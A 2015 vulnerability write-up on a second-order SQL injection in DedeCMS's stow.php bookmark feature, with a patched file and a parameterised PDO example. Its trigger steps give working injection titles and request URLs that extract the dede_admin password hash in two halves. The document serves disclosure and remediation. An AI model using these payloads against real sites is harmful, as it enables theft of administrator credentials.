dedecms /plus/stow.php Second-Order SQL Injection

Posted by Andrew.Hann on 2015-05-19

Contents

1. Vulnerability Description
2. Trigger Conditions
3. Affected Scope
4. Vulnerable Code Analysis
5. Mitigation
6. Offense and Defense Considerations

 

1. Vulnerability Description

The article-bookmark ("stow") feature does not filter the $title variable, which leads to a second-order (stored) SQL injection.

Relevant Link:

http://www.wooyun.org/bugs/wooyun-2013-046375


2. Trigger Conditions

0x1: Publish an article with a specially crafted title

http://127.0.0.1/dedecms5.5/member/content_list.php?channelid=1
// The article title is shown below; its purpose is to append an extra SQL clause that reads out the administrator password
u',char(@`'`), (select pwd from dede_admin))#

0x2: Submit a bookmark request

Get the aid of the article just published, for example aid=108, and send a bookmark request for that article
http://localhost/dedecms5.5/plus/stow.php?aid=108&type=001

0x3: Send a "recommend" request for the article just published

http://localhost/dedecms5.5/member/mystow.php
// Click the "recommend" link of the article just published, which opens the following URL
http://localhost/dedecms5.5/plus/recommend.php?type=29a53fb3c3&aid=108
// Here the "29a53fb3c3" in type=29a53fb3c3 is the first 10 characters of the dede_admin.pwd field; by this point the second-order injection has already taken place

0x4: Inject the remaining 10 characters

The remaining 10 characters are obtained with the same steps, except that the published article's title is
u',char(@`'`),substring((select pwd from dede_admin),11))#

Relevant Link:

http://www.wooyun.org/bugs/wooyun-2013-046375


3. Affected Scope

4. Vulnerable Code Analysis

/plus/stow.php

..
$row = $dsql->GetOne("Select * From `#@__member_stow` where aid='$aid' And mid='{$ml->M_ID}' ");

if(!is_array($row))
{
    //TITLE here is read back from the database, i.e. it is the title of the article we published
    $dsql->ExecuteNoneQuery(" INSERT INTO `#@__member_stow`(mid,aid,title,addtime) VALUES ('".$ml->M_ID."','$aid','".$title."','$addtime'); ");
}
..

Relevant Link:

http://www.wooyun.org/bugs/wooyun-2014-048913


5. Mitigation

/plus/stow.php

<?php
require_once(dirname(__FILE__)."/../include/common.inc.php");

$aid = ( isset($aid) && is_numeric($aid) ) ? $aid : 0;
$type=empty($type)? "" : HtmlReplace($type,1);
if($aid==0)
{
    ShowMsg('文件id不能為空!','javascript:window.close();');
    exit();
}

require_once(DEDEINC."/memberlogin.class.php");
$ml = new MemberLogin();

if($ml->M_ID==0)
{
    ShowMsg('只有會員才允許收藏操作!','javascript:window.close();');
    exit();
}


//Read the document record
$arcRow = GetOneArchive($aid);
if($arcRow['aid']=='')
{
    ShowMsg("無法收藏未知文件!","javascript:window.close();");
    exit();
}
extract($arcRow, EXTR_SKIP);
//Fix: $title now comes from the database rather than from the request, so it
//has to be escaped here before it is reused in SQL; $aid is forced to an integer
$title = HtmlReplace($title,1);
$aid = intval($aid);
//End of fix
$addtime = time();
if($type==''){
    $row = $dsql->GetOne("Select * From `#@__member_stow` where aid='$aid' And mid='{$ml->M_ID}' AND type='' ");
    if(!is_array($row))
    {
        //only the escaped $title may enter the query; the raw database value never does
        $dsql->ExecuteNoneQuery("INSERT INTO `#@__member_stow`(mid,aid,title,addtime) VALUES ('".$ml->M_ID."','$aid','".addslashes($title)."','$addtime'); ");
    }
}else{
    $row = $dsql->GetOne("Select * From `#@__member_stow` where type='$type' and (aid='$aid' And mid='{$ml->M_ID}')");
    if(!is_array($row)){
        $dsql->ExecuteNoneQuery(" INSERT INTO `#@__member_stow`(mid,aid,title,addtime,type) VALUES ('".$ml->M_ID."','$aid','$title','$addtime','$type'); ");
    }
}

//Update the member's statistics
$row = $dsql->GetOne("SELECT COUNT(*) AS nums FROM `#@__member_stow` WHERE `mid`='{$ml->M_ID}' ");
$dsql->ExecuteNoneQuery("UPDATE #@__member_tj SET `stow`='$row[nums]' WHERE `mid`='".$ml->M_ID."'");

ShowMsg('成功收藏一篇文件!','javascript:window.close();');
?>
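Added example, not code from this page or from DedeCMS: the same read-then-write flow as stow.php, replayed against an in-memory SQLite database through PDO so it runs offline. Table names are simplified (archives, member_stow, no #@__ prefix), the functions stow() and stowIsClean() are invented for the illustration, and the sample title is constructed. It shows why the fix above has to act on the value read back from the database: the second INSERT never sees the HTTP request, so request-level filtering cannot protect it, while binding the stored title as a parameter keeps it data on every write.

```php
<?php
// Added example, not DedeCMS code: stow.php's read-then-write flow against an
// in-memory SQLite database (PDO), with every query parameterised so the title
// read back from the database is treated as data on the second write.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec("CREATE TABLE archives (aid INTEGER PRIMARY KEY, title TEXT NOT NULL)");
$pdo->exec("CREATE TABLE member_stow (mid INTEGER, aid INTEGER, title TEXT, addtime INTEGER, type TEXT NOT NULL DEFAULT '')");

// First write: a member publishes an article. Constructed sample title that
// carries the metacharacters the page's payload relies on (quote, comma, '#').
// Nothing stops it from being stored: a title is allowed to contain them.
$publish = $pdo->prepare("INSERT INTO archives (aid, title) VALUES (:aid, :title)");
$publish->execute([':aid' => 108, ':title' => "u', (select 'x')#"]);

// Second write: the bookmark action reads the title back and copies it into
// member_stow. This is the step where the original concatenated the stored
// value into the INSERT; here it is bound, so the quote and '#' never reach
// the SQL parser.
function stow(PDO $pdo, int $mid, int $aid, string $type = ''): bool
{
    $get = $pdo->prepare("SELECT title FROM archives WHERE aid = :aid");
    $get->execute([':aid' => $aid]);
    $title = $get->fetchColumn();
    if ($title === false) {
        return false; // unknown document, same outcome as the "無法收藏未知文件" branch
    }

    $dup = $pdo->prepare("SELECT 1 FROM member_stow WHERE aid = :aid AND mid = :mid AND type = :type");
    $dup->execute([':aid' => $aid, ':mid' => $mid, ':type' => $type]);
    if ($dup->fetchColumn() !== false) {
        return true; // already bookmarked, nothing to insert
    }

    $put = $pdo->prepare(
        "INSERT INTO member_stow (mid, aid, title, addtime, type) VALUES (:mid, :aid, :title, :addtime, :type)"
    );
    $put->execute([
        ':mid'     => $mid,
        ':aid'     => $aid,
        ':title'   => $title,   // stored verbatim, never interpreted
        ':addtime' => time(),
        ':type'    => $type,
    ]);
    return true;
}

// Audit helper: the copied title must be byte-for-byte the stored one and
// exactly one row must exist. A successful injection would break one of the
// two (a truncated title, or extra/altered rows), so this is a cheap
// post-condition to check in tests or a periodic integrity job.
function stowIsClean(PDO $pdo, int $mid, int $aid): bool
{
    $src = $pdo->prepare("SELECT title FROM archives WHERE aid = :aid");
    $src->execute([':aid' => $aid]);
    $dst = $pdo->prepare("SELECT title FROM member_stow WHERE aid = :aid AND mid = :mid");
    $dst->execute([':aid' => $aid, ':mid' => $mid]);
    $copies = $dst->fetchAll(PDO::FETCH_COLUMN);
    return count($copies) === 1 && $copies[0] === $src->fetchColumn();
}

stow($pdo, 1, 108);
var_dump(stowIsClean($pdo, 1, 108)); // true means the copy matches the source row exactly
```

When the same pattern is used against MySQL, set PDO::ATTR_EMULATE_PREPARES to false so the driver sends server-side prepared statements rather than client-side escaping. The $dsql->ExecuteNoneQuery() calls in the listing above take a finished SQL string, which is why the page's fix has to escape $title with HtmlReplace() before concatenation instead of binding it.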


6. Offense and Defense Considerations

Copyright (c) 2015 LittleHann All rights reserved

 
